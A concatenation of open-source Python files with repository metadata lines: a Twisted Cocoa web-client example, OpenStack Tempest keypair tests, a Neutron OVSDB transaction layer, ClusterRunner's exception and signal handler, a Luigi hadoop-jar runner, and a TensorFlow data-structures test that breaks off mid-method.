# create ObjC classes as defined in MainMenu.nib
NibClassBuilder.extractClasses("MainMenu")
class TwistzillaClient(http.HTTPClient):
def __init__(self, delegate, urls):
self.urls = urls
self.delegate = delegate
def connectionMade(self):
self.sendCommand('GET', str(self.urls[2]))
self.sendHeader('Host', '%s:%d' % (self.urls[0], self.urls[1]))
self.sendHeader('User-Agent', 'CocoaTwistzilla')
self.endHeaders()
def handleResponse(self, data):
self.delegate.gotResponse_(data)
class MyAppDelegate(NibClassBuilder.AutoBaseClass):
def gotResponse_(self, html):
s = self.resultTextField.textStorage()
s.replaceCharactersInRange_withString_((0, s.length()), html)
self.progressIndicator.stopAnimation_(self)
def doTwistzillaFetch_(self, sender):
s = self.resultTextField.textStorage()
s.deleteCharactersInRange_((0, s.length()))
self.progressIndicator.startAnimation_(self)
u = urlparse.urlparse(self.messageTextField.stringValue())
pos = u[1].find(':')
if pos == -1:
host, port = u[1], 80
else:
host, port = u[1][:pos], int(u[1][pos+1:])
if u[2] == '':
fname = '/'
else:
fname = u[2]
host = host.encode('utf8')
fname = fname.encode('utf8')
protocol.ClientCreator(reactor, TwistzillaClient, self, (host, port, fname)).connectTCP(host, port).addErrback(lambda f:self.gotResponse_(f.getBriefTraceback()))
def applicationDidFinishLaunching_(self, aNotification):
"""
Invoked by NSApplication once the app is done launching and
immediately before the first pass through the main event
loop.
"""
self.messageTextField.setStringValue_("http://www.twistedmatrix.com/")
reactor.interleave(AppHelper.callAfter)
def applicationShouldTerminate_(self, sender):
if reactor.running:
reactor.addSystemEventTrigger(
'after', 'shutdown', AppHelper.stopEventLoop)
reactor.stop()
return False
return True
if __name__ == '__main__':
log.startLogging(sys.stdout)
AppHelper.runEventLoop()
| sorenh/cc | vendor/Twisted-10.0.0/doc/core/examples/threadedselect/Cocoa/SimpleWebClient/Twistzilla.py | Python | apache-2.0 | 2,737 |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import test
class KeyPairsV3Test(base.BaseComputeTest):
_api_version = 3
@classmethod
def setUpClass(cls):
super(KeyPairsV3Test, cls).setUpClass()
cls.client = cls.keypairs_client
def _delete_keypair(self, keypair_name):
resp, _ = self.client.delete_keypair(keypair_name)
def _create_keypair(self, keypair_name, pub_key=None):
resp, body = self.client.create_keypair(keypair_name, pub_key)
self.addCleanup(self._delete_keypair, keypair_name)
return resp, body
@test.attr(type='gate')
def test_keypairs_create_list_delete(self):
# Keypairs created should be available in the response list
# Create 3 keypairs
key_list = list()
for i in range(3):
k_name = data_utils.rand_name('keypair-')
resp, keypair = self._create_keypair(k_name)
# Need to pop these keys so that our compare doesn't fail later,
            # as the keypair dicts from the list API don't have them.
keypair.pop('private_key')
keypair.pop('user_id')
key_list.append(keypair)
# Fetch all keypairs and verify the list
# has all created keypairs
resp, fetched_list = self.client.list_keypairs()
self.assertEqual(200, resp.status)
# We need to remove the extra 'keypair' element in the
# returned dict. See comment in keypairs_client.list_keypairs()
new_list = list()
for keypair in fetched_list:
new_list.append(keypair['keypair'])
fetched_list = new_list
# Now check if all the created keypairs are in the fetched list
missing_kps = [kp for kp in key_list if kp not in fetched_list]
self.assertFalse(missing_kps,
"Failed to find keypairs %s in fetched list"
% ', '.join(m_key['name'] for m_key in missing_kps))
@test.attr(type='gate')
def test_keypair_create_delete(self):
# Keypair should be created, verified and deleted
k_name = data_utils.rand_name('keypair-')
resp, keypair = self._create_keypair(k_name)
private_key = keypair['private_key']
key_name = keypair['name']
self.assertEqual(key_name, k_name,
"The created keypair name is not equal "
"to the requested name")
self.assertTrue(private_key is not None,
"Field private_key is empty or not found.")
@test.attr(type='gate')
def test_get_keypair_detail(self):
# Keypair should be created, Got details by name and deleted
k_name = data_utils.rand_name('keypair-')
resp, keypair = self._create_keypair(k_name)
resp, keypair_detail = self.client.get_keypair(k_name)
self.assertEqual(200, resp.status)
self.assertIn('name', keypair_detail)
self.assertIn('public_key', keypair_detail)
self.assertEqual(keypair_detail['name'], k_name,
"The created keypair name is not equal "
"to requested name")
public_key = keypair_detail['public_key']
self.assertTrue(public_key is not None,
"Field public_key is empty or not found.")
@test.attr(type='gate')
def test_keypair_create_with_pub_key(self):
# Keypair should be created with a given public key
k_name = data_utils.rand_name('keypair-')
pub_key = ("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCs"
"Ne3/1ILNCqFyfYWDeTKLD6jEXC2OQHLmietMWW+/vd"
"aZq7KZEwO0jhglaFjU1mpqq4Gz5RX156sCTNM9vRbw"
"KAxfsdF9laBYVsex3m3Wmui3uYrKyumsoJn2g9GNnG1P"
"I1mrVjZ61i0GY3khna+wzlTpCCmy5HNlrmbj3XLqBUpip"
"TOXmsnr4sChzC53KCd8LXuwc1i/CZPvF+3XipvAgFSE53pCt"
"LOeB1kYMOBaiUPLQTWXR3JpckqFIQwhIH0zoHlJvZE8hh90"
"XcPojYN56tI0OlrGqojbediJYD0rUsJu4weZpbn8vilb3JuDY+jws"
"snSA8wzBx3A/8y9Pp1B nova@ubuntu")
resp, keypair = self._create_keypair(k_name, pub_key)
self.assertFalse('private_key' in keypair,
"Field private_key is not empty!")
key_name = keypair['name']
self.assertEqual(key_name, k_name,
"The created keypair name is not equal "
"to the requested name!")
class KeyPairsV2TestJSON(KeyPairsV3Test):
_api_version = 2
class KeyPairsV2TestXML(KeyPairsV2TestJSON):
_interface = 'xml'
| Mirantis/tempest | tempest/api/compute/keypairs/test_keypairs.py | Python | apache-2.0 | 5,296 |
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import queue as Queue
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from ovs.db import idl
from neutron.agent.ovsdb import api
from neutron.agent.ovsdb.native import commands as cmd
from neutron.agent.ovsdb.native import connection
from neutron.agent.ovsdb.native import idlutils
from neutron.i18n import _LE
OPTS = [
cfg.StrOpt('ovsdb_connection',
default='tcp:127.0.0.1:6640',
help=_('The connection string for the native OVSDB backend')),
]
cfg.CONF.register_opts(OPTS, 'OVS')
# TODO(twilson) DEFAULT.ovs_vsctl_timeout should be OVS.vsctl_timeout
cfg.CONF.import_opt('ovs_vsctl_timeout', 'neutron.agent.common.ovs_lib')
LOG = logging.getLogger(__name__)
class Transaction(api.Transaction):
def __init__(self, api, ovsdb_connection, timeout,
check_error=False, log_errors=False):
self.api = api
self.check_error = check_error
self.log_errors = log_errors
self.commands = []
self.results = Queue.Queue(1)
self.ovsdb_connection = ovsdb_connection
self.timeout = timeout
    def add(self, command):
        """Add a command to the transaction and return it, as a convenience."""
self.commands.append(command)
return command
def commit(self):
self.ovsdb_connection.queue_txn(self)
result = self.results.get()
if self.check_error:
if isinstance(result, idlutils.ExceptionResult):
if self.log_errors:
LOG.error(result.tb)
raise result.ex
return result
def do_commit(self):
start_time = time.time()
attempts = 0
while True:
elapsed_time = time.time() - start_time
if attempts > 0 and elapsed_time > self.timeout:
raise RuntimeError("OVS transaction timed out")
attempts += 1
# TODO(twilson) Make sure we don't loop longer than vsctl_timeout
txn = idl.Transaction(self.api.idl)
for i, command in enumerate(self.commands):
LOG.debug("Running txn command(idx=%(idx)s): %(cmd)s",
{'idx': i, 'cmd': command})
try:
command.run_idl(txn)
except Exception:
with excutils.save_and_reraise_exception() as ctx:
txn.abort()
if not self.check_error:
ctx.reraise = False
seqno = self.api.idl.change_seqno
status = txn.commit_block()
if status == txn.TRY_AGAIN:
LOG.debug("OVSDB transaction returned TRY_AGAIN, retrying")
if self.api.idl._session.rpc.status != 0:
LOG.debug("Lost connection to OVSDB, reconnecting!")
self.api.idl.force_reconnect()
idlutils.wait_for_change(
self.api.idl, self.timeout - elapsed_time,
seqno)
continue
elif status == txn.ERROR:
msg = _LE("OVSDB Error: %s") % txn.get_error()
if self.log_errors:
LOG.error(msg)
if self.check_error:
# For now, raise similar error to vsctl/utils.execute()
raise RuntimeError(msg)
return
elif status == txn.ABORTED:
LOG.debug("Transaction aborted")
return
elif status == txn.UNCHANGED:
LOG.debug("Transaction caused no change")
return [cmd.result for cmd in self.commands]
class OvsdbIdl(api.API):
ovsdb_connection = connection.Connection(cfg.CONF.OVS.ovsdb_connection,
cfg.CONF.ovs_vsctl_timeout,
'Open_vSwitch')
def __init__(self, context):
super(OvsdbIdl, self).__init__(context)
OvsdbIdl.ovsdb_connection.start()
self.idl = OvsdbIdl.ovsdb_connection.idl
@property
def _tables(self):
return self.idl.tables
@property
def _ovs(self):
return self._tables['Open_vSwitch'].rows.values()[0]
def transaction(self, check_error=False, log_errors=True, **kwargs):
return Transaction(self, OvsdbIdl.ovsdb_connection,
self.context.vsctl_timeout,
check_error, log_errors)
def add_br(self, name, may_exist=True):
return cmd.AddBridgeCommand(self, name, may_exist)
def del_br(self, name, if_exists=True):
return cmd.DelBridgeCommand(self, name, if_exists)
def br_exists(self, name):
return cmd.BridgeExistsCommand(self, name)
def port_to_br(self, name):
return cmd.PortToBridgeCommand(self, name)
def iface_to_br(self, name):
# For our purposes, ports and interfaces always have the same name
return cmd.PortToBridgeCommand(self, name)
def list_br(self):
return cmd.ListBridgesCommand(self)
def br_get_external_id(self, name, field):
return cmd.BrGetExternalIdCommand(self, name, field)
def br_set_external_id(self, name, field, value):
return cmd.BrSetExternalIdCommand(self, name, field, value)
def db_set(self, table, record, *col_values):
return cmd.DbSetCommand(self, table, record, *col_values)
def db_clear(self, table, record, column):
return cmd.DbClearCommand(self, table, record, column)
def db_get(self, table, record, column):
return cmd.DbGetCommand(self, table, record, column)
def db_list(self, table, records=None, columns=None, if_exists=False):
return cmd.DbListCommand(self, table, records, columns, if_exists)
def db_find(self, table, *conditions, **kwargs):
return cmd.DbFindCommand(self, table, *conditions, **kwargs)
def set_controller(self, bridge, controllers):
return cmd.SetControllerCommand(self, bridge, controllers)
def del_controller(self, bridge):
return cmd.DelControllerCommand(self, bridge)
def get_controller(self, bridge):
return cmd.GetControllerCommand(self, bridge)
def set_fail_mode(self, bridge, mode):
return cmd.SetFailModeCommand(self, bridge, mode)
def add_port(self, bridge, port, may_exist=True):
return cmd.AddPortCommand(self, bridge, port, may_exist)
def del_port(self, port, bridge=None, if_exists=True):
return cmd.DelPortCommand(self, port, bridge, if_exists)
def list_ports(self, bridge):
return cmd.ListPortsCommand(self, bridge)
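# A minimal sketch of how the API above is typically driven; the context
# object and the bridge/port names are illustrative.
#
#   ovsdb = OvsdbIdl(context)
#   txn = ovsdb.transaction(check_error=True)
#   txn.add(ovsdb.add_br('br-example'))
#   txn.add(ovsdb.add_port('br-example', 'port0'))
#   txn.commit()
#
# Each add() only queues a command; commit() hands the whole transaction to
# the shared OVSDB connection and blocks until do_commit() produces a result.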
| infobloxopen/neutron | neutron/agent/ovsdb/impl_idl.py | Python | apache-2.0 | 7,372 |
from queue import LifoQueue, Queue
import signal
from threading import current_thread, Lock, main_thread
from app.util import app_info, log, process_utils
from app.util.singleton import Singleton
class UnhandledExceptionHandler(Singleton):
"""
This class implements functionality to catch and log exceptions in a block of code, and also execute a set of
teardown handlers intended to shut down the application gracefully and do any desired cleanup. It is implemented
as a singleton because the teardown handlers can have global effects (e.g., stopping the event loop).
This class is intended to be used as a context manager:
>>> unhandled_exception_handler = UnhandledExceptionHandler.singleton()
>>> with unhandled_exception_handler:
>>> # code which may throw an exception goes here!
"""
HANDLED_EXCEPTION_EXIT_CODE = 1
EXCEPTION_DURING_TEARDOWN_EXIT_CODE = 2
_SIGINFO_DEBUG_LOG = '/tmp/clusterrunner.debug.log'
_signal_names = {
process_utils.SIGINFO: 'SIGINFO',
signal.SIGINT: 'SIGINT',
signal.SIGTERM: 'SIGTERM',
}
def __init__(self):
super().__init__()
self._handling_lock = Lock()
self._teardown_callback_stack = LifoQueue() # we execute callbacks in the reverse order that they were added
self._logger = log.get_logger(__name__)
self._handled_exceptions = Queue()
self._teardown_callback_raised_exception = False
# Set up handlers to be called when the application process receives certain signals.
# Note: this will raise if called on a non-main thread, but we should NOT work around that here. (That could
# prevent the teardown handler from ever being registered!) Calling code should be organized so that this
# singleton is only ever initialized on the main thread.
signal.signal(signal.SIGTERM, self._application_teardown_signal_handler)
signal.signal(signal.SIGINT, self._application_teardown_signal_handler)
try:
signal.signal(process_utils.SIGINFO, self._application_info_dump_signal_handler)
except ValueError:
self._logger.warning('Failed to register signal handler for SIGINFO. This is expected if ClusterRunner '
'is running on Windows.')
@classmethod
def reset_signal_handlers(cls):
"""
Reset all signal handlers to their default values. This is useful in forked subprocesses since we often do not
want to inherit all the signal handlers.
"""
signals_to_reset = dict(cls._signal_names)
signals_to_reset.pop(process_utils.SIGINFO, None) # Leave the SIGINFO handler for forked subprocesses
for signal_num in signals_to_reset:
signal.signal(signal_num, signal.SIG_DFL) # SIG_DFL restores the default behavior for each signal
def add_teardown_callback(self, callback, *callback_args, **callback_kwargs):
"""
Add a callback to be executed in the event of application teardown.
:param callback: The method callback to execute
:type callback: callable
:param callback_args: args to be passed to the callback function
:type callback_args: list
:param callback_kwargs: kwargs to be passed to the callback function
:type callback_kwargs: dict
"""
self._teardown_callback_stack.put((callback, callback_args, callback_kwargs))
def _application_teardown_signal_handler(self, sig, frame):
"""
A signal handler that will trigger application teardown.
:param sig: Signal number of the received signal
:type sig: int
:param frame: The interrupted stack frame
:type frame: frame
"""
self._logger.info('{} signal received. Triggering teardown.', self._signal_names[sig])
raise AppTeardown
def _application_info_dump_signal_handler(self, sig, frame):
"""
A signal handler that will dump application info to the logs.
:param sig: Signal number of the received signal
:type sig: int
:param frame: The interrupted stack frame
:type frame: frame
"""
self._logger.info('{} signal received. Dumping application info.', self._signal_names[sig])
app_info_string = app_info.get_app_info_string()
self._logger.notice(app_info_string)
with open(self._SIGINFO_DEBUG_LOG, 'a') as f:
f.write("{}\n".format(app_info_string))
def __enter__(self):
"""
Enables this to be used as a context manager. No special handling is needed on enter.
"""
pass
def __exit__(self, exc_type, exc_value, traceback):
"""
Enables this to be used as a context manager. If an exception was raised during the execution block (inside the
"with" statement) then exc_value will be set to the exception object.
There are four situations in which we can go through this method:
1. Exception, on main thread
- The exception is logged and in some cases (e.g., SystemExit) may be immediately reraised.
- Teardown callbacks are executed.
- Example: A KeyboardInterrupt exception raised because user presses ctrl-c / sends SIGINT signal
2. Exception, not on main thread
- The exception is logged and in some cases may be passed to the main thread to be reraised.
- Teardown callbacks are executed.
- Example: Any unhandled exception that is raised on a SafeThread
3. Normal exit, on main thread
- We check to see if there was an exception that we need to reraise on the main thread. In almost all cases
we will *not* reraise an exception on the main thread since it has already been logged and teardown
callbacks have already been executed on the thread that raised the exception.
- Teardown callbacks are *not* executed.
- Example: A SystemExit exception raised by sys.exit() is passed from a SafeThread to the main thread to
make Python set the exit code.
4. Normal exit, not on main thread
- Do nothing! All is well.
"""
if exc_value:
# An exception occurred during execution, so run the teardown callbacks. We use a lock here since multiple
# threads could raise exceptions at the same time and we only want to execute these once.
with self._handling_lock:
if not isinstance(exc_value, (SystemExit, AppTeardown, KeyboardInterrupt)):
# It is not very useful to log the SystemExit exception since it is raised by sys.exit(), and thus
# application exit is completely expected.
self._logger.exception('Unhandled exception handler caught exception.')
while not self._teardown_callback_stack.empty():
callback, args, kwargs = self._teardown_callback_stack.get()
self._logger.debug('Executing teardown callback: {}', callback)
try:
callback(*args, **kwargs)
except: # pylint: disable=bare-except
# Also catch any exception that occurs during a teardown callback and log it.
self._teardown_callback_raised_exception = True
self._logger.exception('Exception raised by teardown callback {}', callback)
self._handled_exceptions.put(exc_value)
if current_thread() is main_thread():
# The usage of this class on the main thread is a special case since only exceptions raised on the main
# thread may affect the exit code of the overall application. Any unhandled exceptions raised on child
# threads will only interrupt execution on that particular thread.
#
# This main-thread-only code path serves to ensure that exceptions raised on child threads during a `with
# unhandled_exception_handler` block will also raise an exception on the main thread upon exit of the main
# thread's `with unhandled_exception_handler` block. This ensures we will set a failing exit code even if
# an exception is raised on a child thread.
#
# Note: this only works for child threads protected by the UnhandledExceptionHandler (e.g., an instance of
# a SafeThread).
#
# We check the self._handled_exceptions queue to see if there was an exception that we want to reraise. We
# only care about the first exception on the queue -- it was the first caught exception so it "wins".
if not self._handled_exceptions.empty():
handled_exception = self._handled_exceptions.get()
# We reraise SystemExit on the main thread -- this specific exception is how Python controls setting
# the process exit code, and that only works if raised on the main thread.
if isinstance(handled_exception, SystemExit):
raise handled_exception
# We also want to make sure the process exit code is set non-zero if the UnhandledExceptionHandler
# handled any Exception at all. (Note: this does not include AppTeardown or KeyboardInterrupt, which
# both inherit from BaseException.)
if isinstance(handled_exception, Exception):
raise SystemExit(self.HANDLED_EXCEPTION_EXIT_CODE)
# If an exception was raised while executing one of the teardown callbacks, also make sure to exit with a
# non-zero exit code.
if self._teardown_callback_raised_exception:
raise SystemExit(self.EXCEPTION_DURING_TEARDOWN_EXIT_CODE)
# Returning True from this method tells Python not to re-raise the exc_value exception on the current thread.
return True
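# A minimal sketch of how the handler above is typically wired into an
# application's main(); the teardown callback and its argument are illustrative.
#
#   def _stop_services(service_name):
#       ...  # release resources, stop event loops, etc.
#
#   exception_handler = UnhandledExceptionHandler.singleton()
#   exception_handler.add_teardown_callback(_stop_services, 'example_service')
#   with exception_handler:
#       run_application()  # any unhandled exception runs the teardown stack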
class AppTeardown(BaseException):
"""
Trigger application teardown. This works similarly to raising SystemExit, but unlike SystemExit this will not be
reraised on the main thread. Essentially, this would allow execution of main() in main.py to continue past the
`with unhandled_exception_handler` block.
"""
| nickzuber/ClusterRunner | app/util/unhandled_exception_handler.py | Python | apache-2.0 | 10,423 |
import logging
import os
import random
import luigi.hadoop
import luigi.hdfs
logger = logging.getLogger('luigi-interface')
def fix_paths(job):
"""Coerce input arguments to use temporary files when used for output.
Return a list of temporary file pairs (tmpfile, destination path) and
a list of arguments. Converts each HdfsTarget to a string for the
path."""
tmp_files = []
args = []
for x in job.args():
if isinstance(x, luigi.hdfs.HdfsTarget): # input/output
if x.exists() or not job.atomic_output(): # input
args.append(x.path)
else: # output
x_path_no_slash = x.path[:-1] if x.path[-1] == '/' else x.path
y = luigi.hdfs.HdfsTarget(x_path_no_slash + '-luigi-tmp-%09d' % random.randrange(0, 1e10))
tmp_files.append((y, x_path_no_slash))
logger.info("Using temp path: {0} for path {1}".format(y.path, x.path))
args.append(y.path)
else:
args.append(str(x))
return (tmp_files, args)
class HadoopJarJobRunner(luigi.hadoop.JobRunner):
"""JobRunner for `hadoop jar` commands. Used to run a HadoopJarJobTask"""
def __init__(self):
pass
def run_job(self, job):
# TODO(jcrobak): libjars, files, etc. Can refactor out of
# hadoop.HadoopJobRunner
if not job.jar() or not os.path.exists(job.jar()):
logger.error("Can't find jar: {0}, full path {1}".format(job.jar(),
os.path.abspath(job.jar())))
raise Exception("job jar does not exist")
arglist = [luigi.hdfs.load_hadoop_cmd(), 'jar', job.jar()]
if job.main():
arglist.append(job.main())
jobconfs = job.jobconfs()
for jc in jobconfs:
arglist += ['-D' + jc]
(tmp_files, job_args) = fix_paths(job)
arglist += job_args
luigi.hadoop.run_and_track_hadoop_job(arglist)
for a, b in tmp_files:
a.move(b)
class HadoopJarJobTask(luigi.hadoop.BaseHadoopJobTask):
"""A job task for `hadoop jar` commands that define a jar and (optional)
main method"""
def jar(self):
"""Path to the jar for this Hadoop Job"""
return None
def main(self):
"""optional main method for this Hadoop Job"""
return None
def job_runner(self):
# We recommend that you define a subclass, override this method and set up your own config
return HadoopJarJobRunner()
def atomic_output(self):
"""If True, then rewrite output arguments to be temp locations and
atomically move them into place after the job finishes"""
return True
def args(self):
"""returns an array of args to pass to the job (after hadoop jar <jar> <main>)."""
return []
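# A minimal sketch of a concrete task built on HadoopJarJobTask; the jar path,
# main class and HDFS paths below are illustrative.
class ExampleWordCount(HadoopJarJobTask):
    def output(self):
        return luigi.hdfs.HdfsTarget('/data/wordcount-output')
    def jar(self):
        return '/usr/lib/hadoop/hadoop-examples.jar'
    def main(self):
        return 'org.apache.hadoop.examples.WordCount'
    def args(self):
        # The output target does not exist yet, so fix_paths() swaps in a
        # temporary HDFS path and moves it into place after the job succeeds.
        return ['/data/input', self.output()]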
| mortardata/luigi | luigi/hadoop_jar.py | Python | apache-2.0 | 2,852 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import os
import pickle
from absl.testing import parameterized
import numpy
import six
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import normalization
from tensorflow.python.layers import core as non_keras_core
from tensorflow.python.module import module
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import data_structures
from tensorflow.python.training.tracking import tracking
from tensorflow.python.training.tracking import util
from tensorflow.python.util import nest
from tensorflow.python.util import serialization
class HasList(training.Model):
def __init__(self):
super(HasList, self).__init__()
self.layer_list = data_structures.List([core.Dense(3)])
self.layer_list.append(core.Dense(4))
self.layer_list.extend(
[core.Dense(5),
core.Dense(6, kernel_regularizer=math_ops.reduce_sum)])
self.layer_list += [
core.Dense(7, bias_regularizer=math_ops.reduce_sum),
core.Dense(8)
]
self.layer_list += (
data_structures.List([core.Dense(9)]) + data_structures.List(
[core.Dense(10)]))
self.layer_list.extend(
data_structures.List(
list([core.Dense(11)]) + [core.Dense(12)]))
self.layers_with_updates = data_structures.List(
(normalization.BatchNormalization(),))
def call(self, x):
aggregation = 0.
for l in self.layer_list:
x = l(x)
aggregation += math_ops.reduce_sum(x)
bn, = self.layers_with_updates
return bn(x) / aggregation
class ListTests(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testTracking(self):
model = HasList()
output = model(array_ops.ones([32, 2]))
self.assertAllEqual([32, 12], output.shape)
self.assertEqual(11, len(model.layers))
self.assertEqual(10, len(model.layer_list.layers))
six.assertCountEqual(
self,
model.layers,
model.layer_list.layers + model.layers_with_updates)
for index in range(10):
self.assertEqual(3 + index, model.layer_list.layers[index].units)
self.assertEqual(2, len(model._checkpoint_dependencies))
self.assertIs(model.layer_list, model._checkpoint_dependencies[0].ref)
self.assertIs(model.layers_with_updates,
model._checkpoint_dependencies[1].ref)
self.assertEqual(
10, len(model._checkpoint_dependencies[0].ref._checkpoint_dependencies))
self.evaluate([v.initializer for v in model.variables])
self.evaluate(model.variables[0].assign([[1., 2., 3.], [4., 5., 6.]]))
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
self.evaluate(model.variables[0].assign(array_ops.zeros([2, 3])))
model.load_weights(save_path)
self.assertAllEqual([[1., 2., 3.], [4., 5., 6.]],
self.evaluate(model.variables[0]))
v = variables.Variable(1.)
model.var_list = [v]
self.assertIn(v, model.variables)
self.assertIn(v, model.trainable_variables)
self.assertNotIn(v, model.non_trainable_variables)
self.assertIn(model.layer_list[0].trainable_weights[0],
model.trainable_weights)
def testSubModelTracking(self):
model = training.Model()
model.v = variables.Variable(1.)
self.assertIn(model.v, model.trainable_weights)
model2 = training.Model()
model2.m = [model]
self.assertIn(model.v, model2.trainable_weights)
def testSubSequentialTracking(self):
class _Subclassed(training.Model):
def __init__(self, wrapped):
super(_Subclassed, self).__init__()
self._wrapped = wrapped
def call(self, x):
return self._wrapped(x)
model = sequential.Sequential()
layer = core.Dense(1)
model.add(layer)
model2 = _Subclassed(model)
model2(array_ops.ones([1, 2]))
model2.m = [model]
self.assertIn(layer.kernel, model2.trainable_weights)
def testLayerTrackedThroughSequential(self):
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def ffnet(layer_sizes, name):
ff = sequential.Sequential(name=name)
for i, width in enumerate(layer_sizes):
ff.add(core.Dense(
width,
activation=("relu" if i < len(layer_sizes)-1 else None)))
return ff
class MyModel2(training.Model):
def __init__(self, config, name="my_model_2"):
super(MyModel2, self).__init__(name=name)
self._num_tokens = config.num_tokens
# list of sub-models
self._ffnet = [ffnet(config.module_layers + (self._num_tokens,), "ff")]
def null_input(self):
return array_ops.zeros([1, self._num_tokens], dtype=dtypes.float32)
def call(self, input_, module_index=None):
return self._ffnet[0](input_)
m2 = MyModel2(AttrDict(
num_tokens=5,
module_layers=(50, 30)))
# Construct
m2(m2.null_input())
self.assertLen(m2.trainable_variables, 6)
def testJSONSerialization(self):
obj = tracking.AutoTrackable()
obj.l = [1]
json.dumps(obj.l, default=serialization.get_json_type)
@test_util.run_v1_only("b/120545219")
def testUpdatesForwarded(self):
with context.graph_mode():
model = HasList()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertGreater(len(model.layers_with_updates[0].updates), 0)
self.assertEqual(set(model.layers_with_updates[0].updates),
set(model.updates))
with context.eager_mode():
model = HasList()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertEqual(0, len(model.updates))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testLossesForwarded(self):
model = HasList()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertEqual(2, len(model.losses))
def testModelContainersCompareEqual(self):
class HasEqualContainers(training.Model):
def __init__(self):
super(HasEqualContainers, self).__init__()
self.l1 = []
self.l2 = []
model = HasEqualContainers()
first_layer = HasEqualContainers()
model.l1.append(first_layer)
second_layer = HasEqualContainers()
model.l2.append(second_layer)
self.assertEqual([first_layer, second_layer], model.layers)
def testNotTrackable(self):
class NotTrackable(object):
pass
with self.assertRaises(ValueError):
data_structures.List([NotTrackable()])
def testCallNotImplemented(self):
with self.assertRaisesRegexp(TypeError, "not callable"):
data_structures.List()(1.)
def testNoPop(self):
with self.assertRaises(AttributeError):
data_structures.List().pop()
@test_util.run_in_graph_and_eager_modes
def testTensorConversion(self):
class ListToTensor(training.Model):
def __init__(self):
super(ListToTensor, self).__init__()
self.l = [1., 2., 3.]
self.assertAllEqual(
[1., 2., 3.],
self.evaluate(constant_op.constant(ListToTensor().l)))
self.assertAllEqual(
[1., 2., 3.],
        self.evaluate(array_ops.stack(ListToTensor().l)))
def testNesting(self):
with context.graph_mode():
inner = data_structures.List()
outer = data_structures.List([inner])
inner.append(non_keras_core.Dense(1))
inner[0](array_ops.ones([2, 3]))
self.assertEqual(2, len(outer.variables))
self.assertIsInstance(
outer.variables[0],
resource_variable_ops.ResourceVariable)
def testNonLayerVariables(self):
v = resource_variable_ops.ResourceVariable([1.])
l = data_structures.List([v])
self.assertTrue(l.trainable)
self.assertEqual([], l.layers)
self.assertEqual([v], l.variables)
self.assertEqual([v], l.trainable_weights)
self.assertEqual([], l.non_trainable_variables)
l.trainable = False
self.assertEqual([v], l.variables)
self.assertEqual([], l.trainable_variables)
self.assertEqual([v], l.non_trainable_variables)
l.trainable = True
v2 = resource_variable_ops.ResourceVariable(1., trainable=False)
l.append(v2)
self.assertEqual([v, v2], l.weights)
self.assertEqual([v], l.trainable_weights)
self.assertEqual([v2], l.non_trainable_weights)
def testCopy(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
v3 = resource_variable_ops.ResourceVariable(1.)
l1 = data_structures.List([v1, v2])
l2 = l1.copy()
l2.append(v3)
self.assertEqual(list(l1), [v1, v2])
self.assertEqual(list(l2), [v1, v2, v3])
def testSlicing(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
v3 = resource_variable_ops.ResourceVariable(1.)
v4 = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v1, v2, v3, v4])
self.assertEqual(l[1:], [v2, v3, v4])
self.assertEqual(l[1:-1], [v2, v3])
self.assertEqual(l[:-1], [v1, v2, v3])
def testHash(self):
has_sequences = set([data_structures.List(),
data_structures.List()])
self.assertEqual(2, len(has_sequences))
self.assertNotIn(data_structures.List(), has_sequences)
def testIMul_zero(self):
l = data_structures.List([])
with self.assertRaisesRegexp(ValueError, "List only supports append"):
l *= 0
def testIMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v])
l *= 2
self.assertEqual(list(l), [v] * 2)
def testMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v, v, v])
